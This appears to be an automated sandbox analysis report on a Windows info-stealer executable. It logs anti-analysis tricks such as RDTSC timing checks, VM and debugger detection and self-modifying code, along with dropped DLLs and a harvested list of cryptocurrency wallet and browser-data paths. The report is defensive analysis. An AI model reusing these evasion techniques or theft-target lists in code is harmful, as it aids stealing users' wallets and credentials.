              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 50605F5 second address: 50605F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 50605F9 second address: 50605FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 50605FF second address: 5060642 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA6412h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 dec edi 0x0000000a jmp 00007EFD88CA6410h 0x0000000f lea ebx, dword ptr [edi+01h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007EFD88CA6417h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 5060642 second address: 50606E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 851Ah 0x00000007 push ebx 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov al, byte ptr [edi+01h] 0x0000000f pushad 0x00000010 call 00007EFD88B5ADC3h 0x00000015 pushfd 0x00000016 jmp 00007EFD88B5ADC8h 0x0000001b add esi, 0DDC9FB8h 0x00000021 jmp 00007EFD88B5ADBBh 0x00000026 popfd 0x00000027 pop eax 0x00000028 mov bx, D6FCh 0x0000002c popad 0x0000002d inc edi 0x0000002e jmp 00007EFD88B5ADBBh 0x00000033 test al, al 0x00000035 pushad 0x00000036 mov cx, 39FBh 0x0000003a mov ebx, eax 0x0000003c popad 0x0000003d jne 00007EFDF88E3189h 0x00000043 pushad 0x00000044 jmp 00007EFD88B5ADC8h 0x00000049 mov edx, esi 0x0000004b popad 0x0000004c mov ecx, edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007EFD88B5ADC3h 0x00000055 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 50606E5 second address: 5060703 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push esi 0x00000007 pop edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b shr ecx, 02h 0x0000000e jmp 00007EFD88CA640Ah 0x00000013 rep movsd 0x00000015 rep movsd 0x00000017 rep movsd 0x00000019 rep movsd 0x0000001b rep movsd 0x0000001d pushad 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 5060703 second address: 506072D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007EFD88B5ADBAh 0x0000000a xor cl, 00000038h 0x0000000d jmp 00007EFD88B5ADBBh 0x00000012 popfd 0x00000013 popad 0x00000014 mov bh, al 0x00000016 popad 0x00000017 mov ecx, edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 506072D second address: 5060731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 5060731 second address: 5060735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 5060735 second address: 506073B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 506073B second address: 5060741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 5060741 second address: 5060745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 5060745 second address: 5060765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and ecx, 03h 0x0000000b jmp 00007EFD88B5ADBDh 0x00000010 rep movsb 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 5060765 second address: 5060769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 5060769 second address: 506076D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 506076D second address: 5060773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 5060773 second address: 5060779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 5060779 second address: 50607BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA640Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-04h], FFFFFFFEh 0x00000012 jmp 00007EFD88CA6410h 0x00000017 mov eax, ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007EFD88CA6417h 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 50607BD second address: 50607C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 50607C3 second address: 50607C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 50607C7 second address: 50607D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp-10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 50607D8 second address: 50607DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 50607DC second address: 50607E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 50607E2 second address: 506080F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA640Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr fs:[00000000h], ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007EFD88CA6415h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 506080F second address: 506082F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88B5ADC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, di 0x00000010 mov ax, dx 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 506082F second address: 5060835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 5060835 second address: 5060839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 5060839 second address: 5060889 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 jmp 00007EFD88CA6416h 0x0000000e pop esi 0x0000000f jmp 00007EFD88CA6410h 0x00000014 pop ebx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushfd 0x00000019 jmp 00007EFD88CA640Ch 0x0000001e and cl, 00000068h 0x00000021 jmp 00007EFD88CA640Bh 0x00000026 popfd 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 5060889 second address: 50604A1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 4295A55Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, 3199387Bh 0x0000000e popad 0x0000000f leave 0x00000010 jmp 00007EFD88B5ADBEh 0x00000015 retn 0008h 0x00000018 cmp dword ptr [ebp-2Ch], 10h 0x0000001c mov eax, dword ptr [ebp-40h] 0x0000001f jnc 00007EFD88B5ADB5h 0x00000021 push eax 0x00000022 lea edx, dword ptr [ebp-00000590h] 0x00000028 push edx 0x00000029 call esi 0x0000002b push 00000008h 0x0000002d jmp 00007EFD88B5ADC7h 0x00000032 push 74910AEFh 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007EFD88B5ADC5h 0x0000003e add esi, 58910F06h 0x00000044 jmp 00007EFD88B5ADC1h 0x00000049 popfd 0x0000004a pushfd 0x0000004b jmp 00007EFD88B5ADC0h 0x00000050 or esi, 49F495A8h 0x00000056 jmp 00007EFD88B5ADBBh 0x0000005b popfd 0x0000005c popad 0x0000005d add dword ptr [esp], 00551139h 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007EFD88B5ADC0h 0x0000006d rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 5060935 second address: 5060939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 5060939 second address: 5060956 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88B5ADC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 5060956 second address: 5060970 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFD88CA640Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeRDTSC instruction interceptor: First address: 5060970 second address: 506097F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88B5ADBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | RDTSC instruction interceptor: First address: 506097F second address: 5060985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | RDTSC instruction interceptor: First address: 5060985 second address: 5060989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | RDTSC instruction interceptor: First address: 5060989 second address: 50609CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov si, 9F23h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007EFD88CA6416h 0x00000015 sub ah, 00000068h 0x00000018 jmp 00007EFD88CA640Bh 0x0000001d popfd 0x0000001e mov dx, cx 0x00000021 popad 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | RDTSC instruction interceptor: First address: 50609CA second address: 50609CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | RDTSC instruction interceptor: First address: 50609CE second address: 50609D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | RDTSC instruction interceptor: First address: 50609D4 second address: 50609DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | RDTSC instruction interceptor: First address: 50609DA second address: 50609DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | RDTSC instruction interceptor: First address: 50609DE second address: 50609E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Special instruction interceptor: First address: 75F95E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Special instruction interceptor: First address: 75FA64 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Special instruction interceptor: First address: 8FD90C instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Special instruction interceptor: First address: 98564B instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Dropped PE file which has not been started: C:\ProgramData\nss3.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: 0_2_6C59EBF0 PR_GetNumberOfProcessors,GetSystemInfo, 0_2_6C59EBF0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
              Source: 0vsAIy0DhJ.exe, 0vsAIy0DhJ.exe, 00000000.00000002.2004288990.00000000008DC000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001073000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@o
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010A3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.000000000102E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2004288990.00000000008DC000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | System information queried: ModuleInformation
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Thread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Open window title or class name: regmonclass
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Open window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Open window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Open window title or class name: ollydbg
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Open window title or class name: filemonclass
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: NTICE
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: SICE
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: SIWVID
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: 0_2_6C66AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C66AC62
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match | File source: Process Memory Space: 0vsAIy0DhJ.exe PID: 2004, type: MEMORYSTR
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: 0_2_6C6B4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 0_2_6C6B4760
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: 0_2_6C591C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint, 0_2_6C591C30
              Source: 0vsAIy0DhJ.exe, 0vsAIy0DhJ.exe, 00000000.00000002.2004288990.00000000008DC000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: #Program Manager
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: 0_2_6C66AE71 cpuid 0_2_6C66AE71
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: 0_2_6C66A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_6C66A8DC
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: 0_2_6C5B8390 NSS_GetVersion, 0_2_6C5B8390

              Stealing of Sensitive Information

              Source: Yara match | File source: 00000000.00000002.2003720246.0000000000511000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.1678322710.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2005346128.000000000102E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: 0vsAIy0DhJ.exe PID: 2004, type: MEMORYSTR
              Source: Yara match | File source: dump.pcap, type: PCAP
              Source: Yara match | File source: Process Memory Space: 0vsAIy0DhJ.exe PID: 2004, type: MEMORYSTR
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000594000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.00000000005C5000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: \ElectronCash\wallets\
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.00000000005C5000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: Jaxx Desktop (old)
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.00000000005C5000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: X\Exodus\exodus.walleta\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\**bbbnhcc\CURRENTCURRENTNT1\model-info.pb\Networkchost.exe
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.00000000005C5000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: info.seco
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.00000000005C5000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: \jaxx\Local Storage\
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.00000000005C5000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: Exodus\exodus.wallet
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.00000000005C5000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: file__0.localstorage
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.00000000005DC000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: \Coinomi\Coinomi\wallets\
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.00000000005C5000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: \Exodus\exodus.wallet\
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.00000000005C5000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: MultiDoge
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.00000000005C5000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: seed.seco
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*e
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
